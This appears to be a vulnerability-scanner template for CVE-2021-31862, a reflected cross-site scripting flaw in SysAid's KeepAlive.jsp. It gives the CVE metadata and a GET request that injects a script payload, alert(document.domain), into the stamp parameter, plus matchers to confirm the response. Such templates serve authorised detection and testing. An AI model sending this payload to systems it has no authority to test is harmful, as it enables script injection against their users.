id: CVE-2021-31862 info: name: SysAid - Reflected XSS author: jas37 description: SysAid 20.4.74 allows XSS via the KeepAlive.jsp stamp parameter without any authentication. severity: medium tags: cve,cve2021,xss,sysaid reference: - https://github.com/RobertDra/CVE-2021-31862/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2021-31862 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-31862 cwe-id: CWE-79 requests: - method: GET path: - '{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E' matchers: - type: dsl dsl: - '(body == "false ")' - 'status_code == 200' condition: and